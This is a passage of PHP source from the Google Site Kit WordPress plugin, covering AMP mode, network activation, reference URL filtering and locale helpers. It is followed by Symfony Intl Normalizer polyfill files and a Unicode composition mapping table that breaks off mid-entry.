AMP_Theme_Support::TRANSITIONAL_MODE_SLUG, AMP_Theme_Support::READER_MODE_SLUG ), true ) ) { return self::AMP_MODE_SECONDARY; } } elseif ( function_exists( 'amp_is_canonical' ) ) { // On older versions, if it is not primary AMP, it is definitely secondary AMP (transitional or reader mode). if ( amp_is_canonical() ) { return self::AMP_MODE_PRIMARY; } return self::AMP_MODE_SECONDARY; } return false; } /** * Checks whether the plugin is network active. * * @since 1.0.0 * * @return bool True if plugin is network active, false otherwise. */ public function is_network_active() { // Determine $network_active property just once per request, to not unnecessarily run this complex logic on every call. if ( null === $this->network_active ) { if ( is_multisite() ) { $network_active_plugins = wp_get_active_network_plugins(); // Consider MU plugins and network-activated plugins as network-active. $this->network_active = strpos( wp_normalize_path( __FILE__ ), wp_normalize_path( WPMU_PLUGIN_DIR ) ) === 0 || in_array( WP_PLUGIN_DIR . '/' . GOOGLESITEKIT_PLUGIN_BASENAME, $network_active_plugins, true ); } else { $this->network_active = false; } } return $this->network_active; } /** * Filters the given entity's reference URL, effectively creating a copy of * the entity with the reference URL accounted for. * * @since 1.15.0 * * @param Entity|null $entity Entity to filter reference ID for, or null. * @return Entity|null Filtered entity or null, based on $entity. */ private function filter_entity_reference_url( ?Entity $entity = null ) { if ( ! $entity ) { return null; } return new Entity( $this->filter_reference_url( $entity->get_url() ), array( 'type' => $entity->get_type(), 'title' => $entity->get_title(), 'id' => $entity->get_id(), ) ); } /** * Filters the given URL to ensure the reference URL is used as part of it. * * If the site reference URL differs from the home URL (e.g. via filters), * this method performs the necessary replacement. * * @since 1.7.0 * * @param string $url Optional. Input URL. If not provided, returns the plain reference site URL. * @return string URL that starts with the reference site URL. */ private function filter_reference_url( $url = '' ) { $site_url = untrailingslashit( $this->get_canonical_home_url() ); /** * Filters the reference site URL to use for stats. * * This can be used to override the current site URL, for example when using the plugin on a non-public site, * such as in a staging environment. * * @since 1.0.0 * * @param string $site_url Reference site URL, typically the WordPress home URL. */ $reference_site_url = apply_filters( 'googlesitekit_site_url', $site_url ); $reference_site_url = untrailingslashit( $reference_site_url ); // Ensure this is not empty. if ( empty( $reference_site_url ) ) { $reference_site_url = $site_url; } // If no URL given, just return the reference site URL. if ( empty( $url ) ) { return $reference_site_url; } // Replace site URL with the reference site URL. if ( $reference_site_url !== $site_url ) { $url = str_replace( $site_url, $reference_site_url, $url ); } return $url; } /** * Calls the WordPress core functions to get the locale and return it in the required format. * * @since 1.32.0 * * @param string $context Optional. Defines which WordPress core locale function to call. * @param string $format Optional. Defines the format the locale is returned in. * @return string Locale in the required format. */ public function get_locale( $context = 'site', $format = 'default' ) { // Get the site or user locale. if ( 'user' === $context ) { $wp_locale = get_user_locale(); } else { $wp_locale = get_locale(); } // Return locale in the required format. if ( 'language-code' === $format ) { $code_array = explode( '_', $wp_locale ); return $code_array[0]; } elseif ( 'language-variant' === $format ) { $variant_array = explode( '_', $wp_locale ); $variant_string = implode( '_', array_slice( $variant_array, 0, 2 ) ); return $variant_string; } return $wp_locale; } } <?php /* namespace Google\Site_Kit_Dependencies intentionally removed */ /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ use Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer as p; if (\PHP_VERSION_ID >= 80000) { return require __DIR__ . '/bootstrap80.php'; } if (!\function_exists('normalizer_is_normalized')) { function normalizer_is_normalized($string, $form = \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer\Normalizer::FORM_C) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer\Normalizer::isNormalized($string, $form); } } if (!\function_exists('normalizer_normalize')) { function normalizer_normalize($string, $form = \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer\Normalizer::FORM_C) { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer\Normalizer::normalize($string, $form); } } <?php namespace Google\Site_Kit_Dependencies; /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ use Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer as p; if (!\function_exists('normalizer_is_normalized')) { function normalizer_is_normalized(?string $string, ?int $form = \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer\Normalizer::FORM_C) : bool { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer\Normalizer::isNormalized((string) $string, (int) $form); } } if (!\function_exists('normalizer_normalize')) { function normalizer_normalize(?string $string, ?int $form = \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer\Normalizer::FORM_C) : string|false { return \Google\Site_Kit_Dependencies\Symfony\Polyfill\Intl\Normalizer\Normalizer::normalize((string) $string, (int) $form); } } <?php namespace Google\Site_Kit_Dependencies; return array('À' => 'À', 'Á' => 'Á', 'Â' => 'Â', 'Ã' => 'Ã', 'Ä' => 'Ä', 'Å' => 'Å', 'Ç' => 'Ç', 'È' => 'È', 'É' => 'É', 'Ê' => 'Ê', 'Ë' => 'Ë', 'Ì' => 'Ì', 'Í' => 'Í', 'Î' => 'Î', 'Ï' => 'Ï', 'Ñ' => 'Ñ', 'Ò' => 'Ò', 'Ó' => 'Ó', 'Ô' => 'Ô', 'Õ' => 'Õ', 'Ö' => 'Ö', 'Ù' => 'Ù', 'Ú' => 'Ú', 'Û' => 'Û', 'Ü' => 'Ü', 'Ý' => 'Ý', 'à' => 'à', 'á' => 'á', 'â' => 'â', 'ã' => 'ã', 'ä' => 'ä', 'å' => 'å', 'ç' => 'ç', 'è' => 'è', 'é' => 'é', 'ê' => 'ê', 'ë' => 'ë', 'ì' => 'ì', 'í' => 'í', 'î' => 'î', 'ï' => 'ï', 'ñ' => 'ñ', 'ò' => 'ò', 'ó' => 'ó', 'ô' => 'ô', 'õ' => 'õ', 'ö' => 'ö', 'ù' => 'ù', 'ú' => 'ú', 'û' => 'û', 'ü' => 'ü', 'ý' => 'ý', 'ÿ' => 'ÿ', 'Ā' => 'Ā', 'ā' => 'ā', 'Ă' => 'Ă', 'ă' => 'ă', 'Ą' => 'Ą', 'ą' => 'ą', 'Ć' => 'Ć', 'ć' => 'ć', 'Ĉ' => 'Ĉ', 'ĉ' => 'ĉ', 'Ċ' => 'Ċ', 'ċ' => 'ċ', 'Č' => 'Č', 'č' => 'č', 'Ď' => 'Ď', 'ď' => 'ď', 'Ē' => 'Ē', 'ē' => 'ē', 'Ĕ' => 'Ĕ', 'ĕ' => 'ĕ', 'Ė' => 'Ė', 'ė' => 'ė', 'Ę' => 'Ę', 'ę' => 'ę', 'Ě' => 'Ě', 'ě' => 'ě', 'Ĝ' => 'Ĝ', 'ĝ' => 'ĝ', 'Ğ' => 'Ğ', 'ğ' => 'ğ', 'Ġ' => 'Ġ', 'ġ' => 'ġ', 'Ģ' => 'Ģ', 'ģ' => 'ģ', 'Ĥ' => 'Ĥ', 'ĥ' => 'ĥ', 'Ĩ' => 'Ĩ', 'ĩ' => 'ĩ', 'Ī' => 'Ī', 'ī' => 'ī', 'Ĭ' => 'Ĭ', 'ĭ' => 'ĭ', 'Į' => 'Į', 'į' => 'į', 'İ' => 'İ', 'Ĵ' => 'Ĵ', 'ĵ' => 'ĵ', 'Ķ' => 'Ķ', 'ķ' => 'ķ', 'Ĺ' => 'Ĺ', 'ĺ' => 'ĺ', 'Ļ' => 'Ļ', 'ļ' => 'ļ', 'Ľ' => 'Ľ', 'ľ' => 'ľ', 'Ń' => 'Ń', 'ń' => 'ń', 'Ņ' => 'Ņ', 'ņ' => 'ņ', 'Ň' => 'Ň', 'ň' => 'ň', 'Ō' => 'Ō', 'ō' => 'ō', 'Ŏ' => 'Ŏ', 'ŏ' => 'ŏ', 'Ő' => 'Ő', 'ő' => 'ő', 'Ŕ' => 'Ŕ', 'ŕ' => 'ŕ', 'Ŗ' => 'Ŗ', 'ŗ' => 'ŗ', 'Ř' => 'Ř', 'ř' => 'ř', 'Ś' => 'Ś', 'ś' => 'ś', 'Ŝ' => 'Ŝ', 'ŝ' => 'ŝ', 'Ş' => 'Ş', 'ş' => 'ş', 'Š' => 'Š', 'š' => 'š', 'Ţ' => 'Ţ', 'ţ' => 'ţ', 'Ť' => 'Ť', 'ť' => 'ť', 'Ũ' => 'Ũ', 'ũ' => 'ũ', 'Ū' => 'Ū', 'ū' => 'ū', 'Ŭ' => 'Ŭ', 'ŭ' => 'ŭ', 'Ů' => 'Ů', 'ů' => 'ů', 'Ű' => 'Ű', 'ű' => 'ű', 'Ų' => 'Ų', 'ų' => 'ų', 'Ŵ' => 'Ŵ', 'ŵ' => 'ŵ', 'Ŷ' => 'Ŷ', 'ŷ' => 'ŷ', 'Ÿ' => 'Ÿ', 'Ź' => 'Ź', 'ź' => 'ź', 'Ż' => 'Ż', 'ż' => 'ż', 'Ž' => 'Ž', 'ž' => 'ž', 'Ơ' => 'Ơ', 'ơ' => 'ơ', 'Ư' => 'Ư', 'ư' => 'ư', 'Ǎ' => 'Ǎ', 'ǎ' => 'ǎ', 'Ǐ' => 'Ǐ', 'ǐ' => 'ǐ', 'Ǒ' => 'Ǒ', 'ǒ' => 'ǒ', 'Ǔ' => 'Ǔ', 'ǔ' => 'ǔ', 'Ǖ' => 'Ǖ', 'ǖ' => 'ǖ', 'Ǘ' => 'Ǘ', 'ǘ' => 'ǘ', 'Ǚ' => 'Ǚ', 'ǚ' => 'ǚ', 'Ǜ' => 'Ǜ', 'ǜ' => 'ǜ', 'Ǟ' => 'Ǟ', 'ǟ' => 'ǟ', 'Ǡ' => 'Ǡ', 'ǡ' => 'ǡ', 'Ǣ' => 'Ǣ', 'ǣ' => 'ǣ', 'Ǧ' => 'Ǧ', 'ǧ' => 'ǧ', 'Ǩ' => 'Ǩ', 'ǩ' => 'ǩ', 'Ǫ' => 'Ǫ', 'ǫ' => 'ǫ', 'Ǭ' => 'Ǭ', 'ǭ' => 'ǭ', 'Ǯ' => 'Ǯ', 'ǯ' => 'ǯ', 'ǰ' => 'ǰ', 'Ǵ' => 'Ǵ', 'ǵ' => 'ǵ', 'Ǹ' => 'Ǹ', 'ǹ' => 'ǹ', 'Ǻ' => 'Ǻ', 'ǻ' => 'ǻ', 'Ǽ' => 'Ǽ', 'ǽ' => 'ǽ', 'Ǿ' => 'Ǿ', 'ǿ' => 'ǿ', 'Ȁ' => 'Ȁ', 'ȁ' => 'ȁ', 'Ȃ' => 'Ȃ', 'ȃ' => 'ȃ', 'Ȅ' => 'Ȅ', 'ȅ' => 'ȅ', 'Ȇ' => 'Ȇ', 'ȇ' => 'ȇ', 'Ȉ' => 'Ȉ', 'ȉ' => 'ȉ', 'Ȋ' => 'Ȋ', 'ȋ' => 'ȋ', 'Ȍ' => 'Ȍ', 'ȍ' => 'ȍ', 'Ȏ' => 'Ȏ', 'ȏ' => 'ȏ', 'Ȑ' => 'Ȑ', 'ȑ' => 'ȑ', 'Ȓ' => 'Ȓ', 'ȓ' => 'ȓ', 'Ȕ' => 'Ȕ', 'ȕ' => 'ȕ', 'Ȗ' => 'Ȗ', 'ȗ' => 'ȗ', 'Ș' => 'Ș', 'ș' => 'ș', 'Ț' => 'Ț', 'ț' => 'ț', 'Ȟ' => 'Ȟ', 'ȟ' => 'ȟ', 'Ȧ' => 'Ȧ', 'ȧ' => 'ȧ', 'Ȩ' => 'Ȩ', 'ȩ' => 'ȩ', 'Ȫ' => 'Ȫ', 'ȫ' => 'ȫ', 'Ȭ' => 'Ȭ', 'ȭ' => 'ȭ', 'Ȯ' => 'Ȯ', 'ȯ' => 'ȯ', 'Ȱ' => 'Ȱ', 'ȱ' => 'ȱ', 'Ȳ' => 'Ȳ', 'ȳ' => 'ȳ', '̀' => '̀', '́' => '́', '̓' => '̓', '̈́' => '̈́', 'ʹ' => 'ʹ', ';' => ';', '΅' => '΅', 'Ά' => 'Ά', '·' => '·', 'Έ' => 'Έ', 'Ή' => 'Ή', 'Ί' => 'Ί', 'Ό' => 'Ό', 'Ύ' => 'Ύ', 'Ώ' => 'Ώ', 'ΐ' => 'ΐ', 'Ϊ' => 'Ϊ', 'Ϋ' => 'Ϋ', 'ά' => 'ά', 'έ' => 'έ', 'ή' => 'ή', 'ί' => 'ί', 'ΰ' => 'ΰ', 'ϊ' => 'ϊ', 'ϋ' => 'ϋ', 'ό' => 'ό', 'ύ' => 'ύ', 'ώ' => 'ώ', 'ϓ' => 'ϓ', 'ϔ' => 'ϔ', 'Ѐ' => 'Ѐ', 'Ё' => 'Ё', 'Ѓ' => 'Ѓ', 'Ї' => 'Ї', 'Ќ' => 'Ќ', 'Ѝ' => 'Ѝ', 'Ў' => 'Ў', 'Й' => 'Й', 'й' => 'й', 'ѐ' => 'ѐ', 'ё' => 'ё', 'ѓ' => 'ѓ', 'ї' => 'ї', 'ќ' => 'ќ', 'ѝ' => 'ѝ', 'ў' => 'ў', 'Ѷ' => 'Ѷ', 'ѷ' => 'ѷ', 'Ӂ' => 'Ӂ', 'ӂ' => 'ӂ', 'Ӑ' => 'Ӑ', 'ӑ' => 'ӑ', 'Ӓ' => 'Ӓ', 'ӓ' => 'ӓ', 'Ӗ' => 'Ӗ', 'ӗ' => 'ӗ', 'Ӛ' => 'Ӛ', 'ӛ' => 'ӛ', 'Ӝ' => 'Ӝ', 'ӝ' => 'ӝ', 'Ӟ' => 'Ӟ', 'ӟ' => 'ӟ', 'Ӣ' => 'Ӣ', 'ӣ' => 'ӣ', 'Ӥ' => 'Ӥ', 'ӥ' => 'ӥ', 'Ӧ' => 'Ӧ', 'ӧ' => 'ӧ', 'Ӫ' => 'Ӫ', 'ӫ' => 'ӫ', 'Ӭ' => 'Ӭ', 'ӭ' => 'ӭ', 'Ӯ' => 'Ӯ', 'ӯ' => 'ӯ', 'Ӱ' => 'Ӱ', 'ӱ' => 'ӱ', 'Ӳ' => 'Ӳ', 'ӳ' => 'ӳ', 'Ӵ' => 'Ӵ', 'ӵ' => 'ӵ', 'Ӹ' => 'Ӹ', 'ӹ' => 'ӹ', 'آ' => 'آ', 'أ' => 'أ', 'ؤ' => 'ؤ', 'إ' => 'إ', 'ئ' => 'ئ', 'ۀ' => 'ۀ', 'ۂ' => 'ۂ', 'ۓ' => 'ۓ', 'ऩ' => 'ऩ', 'ऱ' => 'ऱ', 'ऴ' => 'ऴ', 'क़' => 'क़', 'ख़' => 'ख़', 'ग़' => 'ग़', 'ज़' => 'ज़', 'ड़' => 'ड़', 'ढ़' => 'ढ़', 'फ़' => 'फ़', 'य़' => 'य़', 'ো' => 'ো', 'ৌ' => 'ৌ', 'ড়' => 'ড়', 'ঢ়' => 'ঢ়', 'য়' => 'য়', 'ਲ਼' => 'ਲ਼', 'ਸ਼' => 'ਸ਼', 'ਖ਼' => 'ਖ਼', 'ਗ਼' => 'ਗ਼', 'ਜ਼' => 'ਜ਼', 'ਫ਼' => 'ਫ਼', 'ୈ' => 'ୈ', 'ୋ' => 'ୋ', 'ୌ' => 'ୌ', 'ଡ଼' => 'ଡ଼', 'ଢ଼' => 'ଢ଼', 'ஔ' => 'ஔ', 'ொ' => 'ொ', 'ோ' => 'ோ', 'ௌ' => 'ௌ', 'ై' => 'ై', 'ೀ' => 'ೀ', 'ೇ' => 'ೇ', 'ೈ' => 'ೈ', 'ೊ' => 'ೊ', 'ೋ' => 'ೋ', 'ൊ' => 'ൊ', 'ോ' => 'ോ', 'ൌ' => 'ൌ', 'ේ' => 'ේ', 'ො' => 'ො', 'ෝ' => 'ෝ', 'ෞ' => 'ෞ', 'གྷ' => 'གྷ', 'ཌྷ' => 'ཌྷ', 'དྷ' => 'དྷ', 'བྷ' => 'བྷ', 'ཛྷ' => 'ཛྷ', 'ཀྵ' => 'ཀྵ', 'ཱི' => 'ཱི', 'ཱུ' => 'ཱུ', 'ྲྀ' => 'ྲྀ', 'ླྀ' => 'ླྀ', 'ཱྀ' => 'ཱྀ', 'ྒྷ' => 'ྒྷ', 'ྜྷ' => 'ྜྷ', 'ྡྷ' => 'ྡྷ', 'ྦྷ' => 'ྦྷ', 'ྫྷ' => 'ྫྷ', 'ྐྵ' => 'ྐྵ', 'ဦ' => 'ဦ', 'ᬆ' => 'ᬆ', 'ᬈ' => 'ᬈ', 'ᬊ' => 'ᬊ', 'ᬌ' => 'ᬌ', 'ᬎ' => 'ᬎ', 'ᬒ' => 'ᬒ', 'ᬻ' => 'ᬻ', 'ᬽ' => 'ᬽ', 'ᭀ' => 'ᭀ', 'ᭁ' => 'ᭁ', 'ᭃ' => 'ᭃ', 'Ḁ' => 'Ḁ', 'ḁ' => 'ḁ', 'Ḃ' => 'Ḃ', 'ḃ' => 'ḃ', 'Ḅ' => 'Ḅ', 'ḅ' => 'ḅ', 'Ḇ' => 'Ḇ', 'ḇ' => 'ḇ', 'Ḉ' => 'Ḉ', 'ḉ' => 'ḉ', 'Ḋ' => 'Ḋ', 'ḋ' => 'ḋ', 'Ḍ' => 'Ḍ', 'ḍ' => 'ḍ', 'Ḏ' => 'Ḏ', 'ḏ' => 'ḏ', 'Ḑ' => 'Ḑ', 'ḑ' => 'ḑ', 'Ḓ' => 'Ḓ', 'ḓ' => 'ḓ', 'Ḕ' => 'Ḕ', 'ḕ' => 'ḕ', 'Ḗ' => 'Ḗ', 'ḗ' => 'ḗ', 'Ḙ' => 'Ḙ', 'ḙ' => 'ḙ', 'Ḛ' => 'Ḛ', 'ḛ' => 'ḛ', 'Ḝ' => 'Ḝ', 'ḝ' => 'ḝ', 'Ḟ' => 'Ḟ', 'ḟ' => 'ḟ', 'Ḡ' => 'Ḡ', 'ḡ' => 'ḡ', 'Ḣ' => 'Ḣ', 'ḣ' => 'ḣ', 'Ḥ' => 'Ḥ', 'ḥ' => 'ḥ', 'Ḧ' => 'Ḧ', 'ḧ' => 'ḧ', 'Ḩ' => 'Ḩ', 'ḩ' => 'ḩ', 'Ḫ' => 'Ḫ', 'ḫ' => 'ḫ', 'Ḭ' => 'Ḭ', 'ḭ' => 'ḭ', 'Ḯ' => 'Ḯ', 'ḯ' => 'ḯ', 'Ḱ' => 'Ḱ', 'ḱ' => 'ḱ', 'Ḳ' => 'Ḳ', 'ḳ' => 'ḳ', 'Ḵ' => 'Ḵ', 'ḵ' => 'ḵ', 'Ḷ' => 'Ḷ', 'ḷ' => 'ḷ', 'Ḹ' => 'Ḹ', 'ḹ' => 'ḹ', 'Ḻ' => 'Ḻ', 'ḻ' => 'ḻ', 'Ḽ' => 'Ḽ', 'ḽ' => 'ḽ', 'Ḿ' => 'Ḿ', 'ḿ' => 'ḿ', 'Ṁ' => 'Ṁ', 'ṁ' => 'ṁ', 'Ṃ' => 'Ṃ', 'ṃ' => 'ṃ', 'Ṅ' => 'Ṅ', 'ṅ' => 'ṅ', 'Ṇ' => 'Ṇ', 'ṇ' => 'ṇ', 'Ṉ' => 'Ṉ', 'ṉ' => 'ṉ', 'Ṋ' => 'Ṋ', 'ṋ' => 'ṋ', 'Ṍ' => 'Ṍ', 'ṍ' => 'ṍ', 'Ṏ' => 'Ṏ', 'ṏ' => 'ṏ', 'Ṑ' => 'Ṑ', 'ṑ' => 'ṑ', 'Ṓ' => 'Ṓ', 'ṓ' => 'ṓ', 'Ṕ' => 'Ṕ', 'ṕ' => 'ṕ', 'Ṗ' => 'Ṗ', 'ṗ' => 'ṗ', 'Ṙ' => 'Ṙ', 'ṙ' => 'ṙ', 'Ṛ' => 'Ṛ', 'ṛ' => 'ṛ', 'Ṝ' => 'Ṝ', 'ṝ' => 'ṝ', 'Ṟ' => 'Ṟ', 'ṟ' => 'ṟ', 'Ṡ' => 'Ṡ', 'ṡ' => 'ṡ', 'Ṣ' => 'Ṣ', 'ṣ' => 'ṣ', 'Ṥ' => 'Ṥ', 'ṥ' => 'ṥ', 'Ṧ' => 'Ṧ', 'ṧ' => 'ṧ', 'Ṩ' => 'Ṩ', 'ṩ' => 'ṩ', 'Ṫ' => 'Ṫ', 'ṫ' => 'ṫ', 'Ṭ' => 'Ṭ', 'ṭ' => 'ṭ', 'Ṯ' => 'Ṯ', 'ṯ' => 'ṯ', 'Ṱ' => 'Ṱ', 'ṱ' => 'ṱ', 'Ṳ' => 'Ṳ', 'ṳ' => 'ṳ', 'Ṵ' => 'Ṵ', 'ṵ' => 'ṵ', 'Ṷ' => 'Ṷ', 'ṷ' => 'ṷ', 'Ṹ' => 'Ṹ', 'ṹ' => 'ṹ', 'Ṻ' => 'Ṻ', 'ṻ' => 'ṻ', 'Ṽ' => 'Ṽ', 'ṽ' => 'ṽ', 'Ṿ' => 'Ṿ', 'ṿ' => 'ṿ', 'Ẁ' => 'Ẁ', 'ẁ' => 'ẁ', 'Ẃ' => 'Ẃ', 'ẃ' => 'ẃ', 'Ẅ' => 'Ẅ', 'ẅ' => 'ẅ', 'Ẇ' => 'Ẇ', 'ẇ' => 'ẇ', 'Ẉ' => 'Ẉ', 'ẉ' => 'ẉ', 'Ẋ' => 'Ẋ', 'ẋ' => 'ẋ', 'Ẍ' => 'Ẍ', 'ẍ' => 'ẍ', 'Ẏ' => 'Ẏ', 'ẏ' => 'ẏ', 'Ẑ' => 'Ẑ', 'ẑ' => 'ẑ', 'Ẓ' => 'Ẓ', 'ẓ' => 'ẓ', 'Ẕ' => 'Ẕ', 'ẕ' => 'ẕ', 'ẖ' => 'ẖ', 'ẗ' => 'ẗ', 'ẘ' => 'ẘ', 'ẙ' => 'ẙ', 'ẛ' => 'ẛ', 'Ạ' => 'Ạ', 'ạ' => 'ạ', 'Ả' => 'Ả', 'ả' => 'ả', 'Ấ' => 'Ấ', 'ấ' => 'ấ', 'Ầ' => 'Ầ', 'ầ' => 'ầ', 'Ẩ' => 'Ẩ', 'ẩ' => 'ẩ', 'Ẫ' => 'Ẫ', 'ẫ' => 'ẫ', 'Ậ' => 'Ậ', 'ậ' => 'ậ', 'Ắ' => 'Ắ', 'ắ' => 'ắ', 'Ằ' => 'Ằ', 'ằ' => 'ằ', 'Ẳ' => 'Ẳ', 'ẳ' => 'ẳ', 'Ẵ' => 'Ẵ', 'ẵ' => 'ẵ', 'Ặ' => 'Ặ', 'ặ' => 'ặ', 'Ẹ' => 'Ẹ', 'ẹ' => 'ẹ', 'Ẻ' => 'Ẻ', 'ẻ' => 'ẻ', 'Ẽ' => 'Ẽ', 'ẽ' => 'ẽ', 'Ế' => 'Ế', 'ế' => 'ế', 'Ề' => 'Ề', 'ề' => 'ề', 'Ể' => 'Ể', 'ể' => 'ể', 'Ễ' => 'Ễ', 'ễ' => 'ễ', 'Ệ' => 'Ệ', 'ệ' => 'ệ', 'Ỉ' => 'Ỉ', 'ỉ' => 'ỉ', 'Ị' => 'Ị', 'ị' => 'ị', 'Ọ' => 'Ọ', 'ọ' => 'ọ', 'Ỏ' => 'Ỏ', 'ỏ' => 'ỏ', 'Ố' => 'Ố', 'ố' => 'ố', 'Ồ' => 'Ồ', 'ồ' => 'ồ', 'Ổ' => 'Ổ', 'ổ' => 'ổ', 'Ỗ' => 'Ỗ', 'ỗ' => 'ỗ', 'Ộ' => 'Ộ', 'ộ' => 'ộ', 'Ớ' => 'Ớ', 'ớ' => 'ớ', 'Ờ' => 'Ờ', 'ờ' => 'ờ', 'Ở' => 'Ở', 'ở' => 'ở', 'Ỡ' => 'Ỡ', 'ỡ' => 'ỡ', 'Ợ' => 'Ợ', 'ợ' => 'ợ', 'Ụ' => 'Ụ', 'ụ' => 'ụ', 'Ủ' => 'Ủ', 'ủ' => 'ủ', 'Ứ' => 'Ứ', 'ứ' => 'ứ', 'Ừ' => 'Ừ', 'ừ' => 'ừ', 'Ử' => 'Ử', 'ử' => 'ử', 'Ữ' => 'Ữ', 'ữ' => 'ữ', 'Ự' => 'Ự', 'ự' => 'ự', 'Ỳ' => 'Ỳ', 'ỳ' => 'ỳ', 'Ỵ' => 'Ỵ', 'ỵ' => 'ỵ', 'Ỷ' => 'Ỷ', 'ỷ' => 'ỷ', 'Ỹ' => 'Ỹ', 'ỹ' => 'ỹ', 'ἀ' => 'ἀ', 'ἁ' => 'ἁ', 'ἂ' => 'ἂ', 'ἃ' => 'ἃ', 'ἄ' => 'ἄ', 'ἅ' => 'ἅ', 'ἆ' => 'ἆ', 'ἇ' => 'ἇ', 'Ἀ' => 'Ἀ', 'Ἁ' => 'Ἁ', 'Ἂ' => 'Ἂ', 'Ἃ' => 'Ἃ', 'Ἄ' => 'Ἄ', 'Ἅ' => 'Ἅ', 'Ἆ' => 'Ἆ', 'Ἇ' => 'Ἇ', 'ἐ' => 'ἐ', 'ἑ' => 'ἑ', 'ἒ' => 'ἒ', 'ἓ' => 'ἓ', 'ἔ' => 'ἔ', 'ἕ' => 'ἕ', 'Ἐ' => 'Ἐ', 'Ἑ' => 'Ἑ', 'Ἒ' => 'Ἒ', 'Ἓ' => 'Ἓ', 'Ἔ' => 'Ἔ', 'Ἕ' => 'Ἕ', 'ἠ' => 'ἠ', 'ἡ' => 'ἡ', 'ἢ' => 'ἢ', 'ἣ' => 'ἣ', 'ἤ' => 'ἤ', 'ἥ' => 'ἥ', 'ἦ' => 'ἦ', 'ἧ' => 'ἧ', 'Ἠ' => 'Ἠ', 'Ἡ' => 'Ἡ', 'Ἢ' => 'Ἢ', 'Ἣ' => 'Ἣ', 'Ἤ' => 'Ἤ', 'Ἥ' => 'Ἥ', 'Ἦ' => 'Ἦ', 'Ἧ' => 'Ἧ', 'ἰ' => 'ἰ', 'ἱ' => 'ἱ', 'ἲ' => 'ἲ', 'ἳ' => 'ἳ', 'ἴ' => 'ἴ', 'ἵ' => 'ἵ', 'ἶ' => 'ἶ', 'ἷ' => 'ἷ', 'Ἰ' => 'Ἰ', 'Ἱ' => 'Ἱ', 'Ἲ' => 'Ἲ', 'Ἳ' => 'Ἳ', 'Ἴ' => 'Ἴ', 'Ἵ' => 'Ἵ', 'Ἶ' => 'Ἶ', 'Ἷ' => 'Ἷ', 'ὀ' => 'ὀ', 'ὁ' => 'ὁ', 'ὂ' => 'ὂ', 'ὃ' => 'ὃ', 'ὄ' => 'ὄ', 'ὅ' => 'ὅ', 'Ὀ' => 'Ὀ', 'Ὁ' => 'Ὁ', 'Ὂ' => 'Ὂ', 'Ὃ' => 'Ὃ', 'Ὄ' => 'Ὄ', 'Ὅ' => 'Ὅ', 'ὐ' => 'ὐ', 'ὑ' => 'ὑ', 'ὒ' => 'ὒ', 'ὓ' => 'ὓ', 'ὔ' => 'ὔ', 'ὕ' => 'ὕ', 'ὖ' => 'ὖ', 'ὗ' => 'ὗ', 'Ὑ' => 'Ὑ', 'Ὓ' => 'Ὓ', 'Ὕ' => 'Ὕ', 'Ὗ' => 'Ὗ', 'ὠ' => 'ὠ', 'ὡ' => 'ὡ', 'ὢ' => 'ὢ', 'ὣ' => 'ὣ', 'ὤ' => 'ὤ', 'ὥ' => 'ὥ', 'ὦ' => 'ὦ', 'ὧ' => 'ὧ', 'Ὠ' => 'Ὠ', 'Ὡ' => 'Ὡ', 'Ὢ' => 'Ὢ', 'Ὣ' => 'Ὣ', 'Ὤ' => 'Ὤ', 'Ὥ' => 'Ὥ', 'Ὦ' => 'Ὦ', 'Ὧ' => 'Ὧ', 'ὰ' => 'ὰ', 'ά' => 'ά', 'ὲ' => 'ὲ', 'έ' => 'έ', 'ὴ' => 'ὴ', 'ή' => 'ή', 'ὶ' => 'ὶ', 'ί' => 'ί', 'ὸ' => 'ὸ', 'ό' => 'ό', 'ὺ' => 'ὺ', 'ύ' => 'ύ', 'ὼ' => 'ὼ', 'ώ' => 'ώ', 'ᾀ' => 'ᾀ', 'ᾁ' => 'ᾁ', 'ᾂ' => 'ᾂ', 'ᾃ' => 'ᾃ', 'ᾄ' => 'ᾄ', 'ᾅ' => 'ᾅ', 'ᾆ' => 'ᾆ', 'ᾇ' => 'ᾇ', 'ᾈ' => 'ᾈ', 'ᾉ' => 'ᾉ', 'ᾊ' => 'ᾊ', 'ᾋ' => 'ᾋ', 'ᾌ' => 'ᾌ', 'ᾍ' => 'ᾍ', 'ᾎ' => 'ᾎ', 'ᾏ' => 'ᾏ', 'ᾐ' => 'ᾐ', 'ᾑ' => 'ᾑ', 'ᾒ' => 'ᾒ', 'ᾓ' => 'ᾓ', 'ᾔ' => 'ᾔ', 'ᾕ' => 'ᾕ', 'ᾖ' => 'ᾖ', 'ᾗ' => 'ᾗ', 'ᾘ' => 'ᾘ', 'ᾙ' => 'ᾙ', 'ᾚ' => 'ᾚ', 'ᾛ' => 'ᾛ', 'ᾜ' => 'ᾜ', 'ᾝ' => 'ᾝ', 'ᾞ' => 'ᾞ', 'ᾟ' => 'ᾟ', 'ᾠ' => 'ᾠ', 'ᾡ' => 'ᾡ', 'ᾢ' => 'ᾢ', 'ᾣ' => 'ᾣ', 'ᾤ' => 'ᾤ', 'ᾥ' => 'ᾥ', 'ᾦ' => 'ᾦ', 'ᾧ' => 'ᾧ', 'ᾨ' => 'ᾨ', 'ᾩ' => 'ᾩ', 'ᾪ' => 'ᾪ', 'ᾫ' => 'ᾫ', 'ᾬ' => 'ᾬ', 'ᾭ' => 'ᾭ', 'ᾮ' => 'ᾮ', 'ᾯ' => 'ᾯ', 'ᾰ' => 'ᾰ', 'ᾱ' => 'ᾱ', 'ᾲ' => 'ᾲ', 'ᾳ' => 'ᾳ', 'ᾴ' => 'ᾴ', 'ᾶ' => 'ᾶ', 'ᾷ' => 'ᾷ', 'Ᾰ' => 'Ᾰ', 'Ᾱ' => 'Ᾱ', 'Ὰ' => 'Ὰ', 'Ά' => 'Ά', 'ᾼ' => 'ᾼ', 'ι' => 'ι', '῁' => '῁', 'ῂ' => 'ῂ', 'ῃ' => 'ῃ', 'ῄ' 